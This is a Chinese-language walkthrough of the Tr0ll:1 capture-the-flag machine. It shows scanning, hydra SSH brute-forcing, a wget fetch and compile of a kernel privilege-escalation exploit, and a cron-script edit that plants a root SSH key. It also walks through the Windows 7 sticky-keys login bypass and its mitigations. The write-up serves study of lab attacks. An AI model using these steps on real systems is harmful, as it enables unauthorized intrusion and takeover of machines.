**

VulnHub-Tr0ll:1-Walkthrough

**

靶機地址：https://www.vulnhub.com/entry/tr0ll-1,100/
靶機難度：簡單（CTF）
靶機發布日期：2014年8月14日
靶機描述：Tr0ll的靈感來自OSCP實驗室中不斷搖曳的機器
目標：得到root權限&找到proof.txt
作者：大余
時間：2019-12-30

請注意：對于所有這些計算機，我已經使用VMware運行下載的計算機。我將使用Kali Linux作為解決該CTF的攻擊者機器。這里使用的技術僅用于學習教育目的，如果列出的技術用于其他任何目標，我概不負責。

一、信息收集

我們在VM中需要確定攻擊目標的IP地址，需要使用nmap獲取目標IP地址：

我們已經找到了此次CTF目標計算機IP地址：192.168.145.149
我們開始探索機器。第一步是找出目標計算機上可用的開放端口和一些服務

命令：nmap -sS -sV -T5 -A -p- 192.168.145.149
我們可以在上面看到Nmap找到開放的端口22、80，其中暴露的robots.txt和/ secret目錄，還有FTP帶有匿名登錄名：Anonymous FTP login allowed
遵循Nmap的線索，開始進行攻擊

登陸ftp，查看有啥有用信息，這里會用到FTP基礎知識

查看當前目錄，我們發現有一個名為lol.pcap的文件分析包，將文件下載到本地使用Wireshark打開查看（Wireshark需要必須掌握的知識，不會的趕緊腦補）


wireshark打開lol.pcap 發現提示：
FTP Data …secret_stuff.txt
FTP Data Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol Sucks, you were so close… gotta TRY HARDER!（硬生生給你們手打出來的…）
鑒于只發現了SSH/FTP/HTTP，英文說讓我使用root/sup3rs3cr3tdirlol登陸ssh 失敗告終！

我以為我輸入錯了，經過錯了幾次，發現是個坑…哎
跳過這個…繼續尋找信息
從web滲透試試

沒啥有用的信息，繼續瀏覽robots.txt

繼續瀏覽/secret

還是沒什么好的信息，由于前面wireshark打開lol.pcap發現的信息sup3rs3cr3tdirlol，我嘗試著打開目錄

這里我就試著打開，還真有信息…
下載roflmao文件并檢查其類型

它是32位ELF可執行文件，使用strings字符串對其執行一些靜態分析（前面章節有介紹）

進來看到笑臉…Find address 0x0856BF to proceed意思是找到地址0x0856BF
進入看看

發現有兩個文件夾：
good_luck（進入查看包含文件which_one_lol.txt）this_folder_contains_password（進入查看包含文件pass.txt）

這應該是用戶名，因為下面有個pass密碼…

只有一個密碼，將文件都下載下來…使用九頭蛇查看

命令：hydra -L which_one_lol.txt -p Pass.txt 192.168.145.149 ssh
login: overflow
password: Pass.txt
ssh登陸查看信息

靶機正在運行Ubuntu 14.04和3.13內核，看看是否可以找到這些版本的任何特權升級漏洞

二、提權

訪問exploit官網查看到可利用提權shell


在exploit官網查看可以使用37292進行提權（之前文章也遇到過使用37292提權）

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root 由于之前文章使用過我本地已經有shell了，然后使用python創建一個服務，通過服務上傳37292.c到靶機中

命令：python -m SimpleHTTPServer 5555

使用python獲得的shell權限后，得使用ptyhon獲得tty，使用
命令：python -c ‘import pty; pty.spawn("/bin/bash")’

命令：wget http://192.168.145.143:5555/37292.c

gcc 37292.c -o dayu
./dayu

獲得root權限，并查看proof.txt內容

三、提權方法

這臺靶機你們會遇到登陸ssh overflow@192.168.145.149后會2分鐘就自動斷開會話超時，然后得重新連接，這邊繼續講另外一種提權方法（我這邊回家操作了IP地址變動了）
會話自動斷開，原因可能是設置了計劃任務
查看日志/var/log/cronlog

繼續查看信息/lib/log/cleaner.py


cleaner.py腳本是以root權限執行的，并且該腳本是全局可寫的，那么我們就可以利用這一點進行提權

使用ssh-keygen（用來生成ssh公鑰認證所需的公鑰和私鑰文件）
目錄默認、密碼Pass.txt、反復輸入密碼即可在/root/.ssh/目錄生成id_rsa、 id_rsa.pub文件


將 id_rsa.pub產生的密匙內容復制到文本中

使用vim修改cleaner.py文件
命令：
#!/usr/bin/env python
import os
import sys
try:
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “加上 id_rsa.pub產生的密匙內容上圖有例子” >> /root/.ssh/authorized_keys’)
except:
sys.exit()
這腳本提供給大家，收藏慢慢累積學習

出來后直接執行ssh root@192.168.182.143，然后輸入Pass.txt即可登錄
這邊的例子請用在正途！！后面還可以用反彈shell，或者自己寫木馬shell去提權，目前我還比較菜…在努力腦補！！
不缺乏更多的方式方法，方法知曉記得越來越多，網絡安全就會在你面前形同一張紙，你想進入就動動手指即可！！

此文章還未完…
由于我好朋友都和我說看不懂我的文章，我后期會陸陸續續分享一些生活中能簡單利用的windows漏洞！
此方法針對的是未打最新補丁的用戶（目前我身邊的人windows都有這個漏洞…看到的盡快打上補丁）
今天講解的是利用5次shift漏洞破解win7密碼（后續會介紹win10）

連續按5次shift如果出現了和上圖一樣的界面，就存在此可利用漏洞！！！

如果存在，右下角重新啟動電腦

然后在上圖“正在啟動Windows”界面強制關機，拔掉電源即可…!!!
在開機！！

開機后會出現**進入啟動啟動修復（推薦）**選項界面，選擇修復

修復會進入這個界面，千萬別點還原…點取消

點查看問題詳情

點擊erofflps.txt目錄



到C盤system32目錄下往下翻能看到藍色的圖標名稱：sethc

重命名文件改123（名稱隨意改）

繼續往下找到黑色圖標：CMD文件

復制一個cmd！！！

將復制的cmd副本改名

改成sethc
然后關掉記事本文件

完成重啟即可

到用戶密碼輸入界面連續按5次shift即可出現上圖，到了這兒下一步我就不教了，希望大家慎重！！
下面我教大家修復的辦法:


這方法只能緩解，有時候重啟電腦就不生效了，如果系統盤為NTFS文件系統，可以將sytem32下的sethc.exe文件設為everyone拒絕訪問,或者直接將其刪除，最好的方法是在控制面板-輔助功能選項-粘滯鍵選項，將“使用快捷鍵”取消即可。
最有效的方法就是更新系統補丁至最新！！！！！

由于我們已經成功得到root權限&找到proof.txt，因此完成了CTF靶機，希望你們喜歡這臺機器，請繼續關注大余后期會有更多具有挑戰性的機器，一起練習學習。

如果你有其他的方法，歡迎留言。要是有寫錯了的地方，請你一定要告訴我。要是你覺得這篇博客寫的還不錯，歡迎分享給身邊的人。

總結

以上是生活随笔為你收集整理的No.4-VulnHub-Tr0ll:1-Walkthrough渗透学习的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。